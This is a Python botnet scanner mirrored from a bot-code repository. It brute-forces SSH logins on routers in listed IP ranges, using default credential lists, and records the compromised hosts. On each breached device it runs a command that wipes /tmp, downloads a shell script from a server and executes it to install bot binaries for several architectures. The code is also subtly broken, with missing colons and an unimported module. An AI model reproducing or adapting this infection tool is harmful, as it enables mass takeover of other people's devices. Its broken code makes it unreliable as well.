mirror of https://github.com/threatland/TL-BOTS
133 lines
6.2 KiB
Python
133 lines
6.2 KiB
Python
|
#!/usr/bin/python
|
||
|
import sys, socket, threading, time, paramiko, random
|
||
|
|
||
|
print "###############################################################################"
|
||
|
print "# ___ __________ ____ _______ _____ _______________.___. ___ #"
|
||
|
print "# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #"
|
||
|
print "# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #"
|
||
|
print "# | | \ | / | \/ | \ | \\____ | #"
|
||
|
print "# |______ / |___\____|__ /\____|__ /____|_ // ______| #"
|
||
|
print "# \/ \/ \/ \/ \/ #"
|
||
|
print "###############################################################################"
|
||
|
print " [~] BOTNET SCANNER [~] "
|
||
|
print
|
||
|
|
||
|
StartScan = random.choice(["Start Infecting Routerz."])
|
||
|
raw_input=('Press <Enter> to'+StartScan)
|
||
|
|
||
|
#ENTER YOUR SERVER IP
|
||
|
serverip = "0.0.0.0"
|
||
|
|
||
|
#ENTER YOUR COMMAND/WGET LINE
|
||
|
cmd = "cd /tmp; rm -rf *; wget -q http://0.0.0.0/gtop.sh; chmod +x gtop.sh; sh gtop.sh; rm -f *"
|
||
|
|
||
|
#ENTER YOUR BOTNAMES HERE
|
||
|
botnames = [
|
||
|
"gtop.sh",
|
||
|
"jackmyarmv6",
|
||
|
"jackmyi586",
|
||
|
"jackmyi686",
|
||
|
"jackmymips",
|
||
|
"jackmymipsel",
|
||
|
"jackmypowerpc",
|
||
|
"jackmysh4",
|
||
|
"jackmyx86"
|
||
|
]
|
||
|
|
||
|
#USERNAME LIST
|
||
|
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
|
||
|
|
||
|
#PASSWORD LIST
|
||
|
passlist = [ 'root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
|
||
|
|
||
|
#DEFAULT RANGES
|
||
|
ipranges = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",]
|
||
|
|
||
|
if sys.argv[3] == 'best':
|
||
|
passwords = [userlist+ ":" +passlist]
|
||
|
if sys.argv[3] == '1':
|
||
|
passwords = [ "root:root", "root:admin", "admin:admin", "ubnt:ubnt", "root:1234", "admin:1234", "guest:guest", "user:user", "test:test" ] #Slow but effective
|
||
|
if sys.argv[3] == '2':
|
||
|
passwords = [ "root:root", "admin:admin", "ubnt:ubnt" ] #faster with decent execution
|
||
|
if sys.argv[3] == 'perl':
|
||
|
passwords = [ "pi:raspberry", "vagrant:vagrant" ] #perl scanner
|
||
|
if sys.argv[3] == 'ubnt':
|
||
|
passwords = [ "ubnt:ubnt" ]
|
||
|
|
||
|
def IPRange(start_ip, end_ip):
|
||
|
start = list(map(int, start_ip.split(".")))
|
||
|
end = list(map(int, end_ip.split(".")))
|
||
|
temp = start
|
||
|
ip_range = []
|
||
|
|
||
|
ip_range.append(start_ip)
|
||
|
while temp != end:
|
||
|
start[3] += 1
|
||
|
for i in (3, 2, 1):
|
||
|
if temp[i] == 256:
|
||
|
temp[i] = 0
|
||
|
temp[i-1] += 101
|
||
|
ip_range.append(".".join(map(str, temp)))
|
||
|
|
||
|
return ip_range
|
||
|
|
||
|
class sshscanner(threading.Thread):
|
||
|
def SelfIP (self, ip):
|
||
|
threading.Thread.SelfIP(self)
|
||
|
self.ip = str(ip)
|
||
|
global passwords
|
||
|
def run(self):
|
||
|
x = 1
|
||
|
while x != 0:
|
||
|
try:
|
||
|
username=(userlist)
|
||
|
password=(passlist)
|
||
|
port = 22
|
||
|
s.close
|
||
|
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
|
||
|
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
||
|
s.settimeout(3)
|
||
|
s.connect((self.ip, port))
|
||
|
s.close()
|
||
|
ssh = paramiko.SSHClient()
|
||
|
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||
|
dobreak=False
|
||
|
for passwd in passwords
|
||
|
if ":n/a"
|
||
|
password=""
|
||
|
else:
|
||
|
password=passwd.split(":")[1]
|
||
|
if "n/a" in passwd:
|
||
|
username=""
|
||
|
else:
|
||
|
username=passwd.split(":")[0]
|
||
|
try:
|
||
|
ssh.connect(self.ip, port = port, username=username, password=password, timeout=3)
|
||
|
dobreak=True
|
||
|
break
|
||
|
except:
|
||
|
pass
|
||
|
if True == dobreak:
|
||
|
badserver = True
|
||
|
stdin, stdout, stderr = ssh.exec_command("echo blackjesus")
|
||
|
output = stdout.read()
|
||
|
if "blackjesus" in output:
|
||
|
badserver=False
|
||
|
if badserver == False:
|
||
|
os.system("echo -e " +username+ ":" +password+ ":" +self.ip " >> vuln.txt")
|
||
|
print "\033[32mINFECTING:" +username+ ":" +password+ ":" +self.ip+ "\033[0m"
|
||
|
ssh.exec_command(cmd)
|
||
|
time.sleep(3)
|
||
|
ssh.close()
|
||
|
if badserver == True
|
||
|
ssh.close()
|
||
|
except:
|
||
|
pass
|
||
|
x = 0
|
||
|
IP_Range = IPRange("" +sys.argv[1], "" +sys.argv[2])
|
||
|
for IP in IP_Range
|
||
|
try:
|
||
|
t = sshscanner(IP)
|
||
|
t.start()
|
||
|
except:
|
||
|
pass
|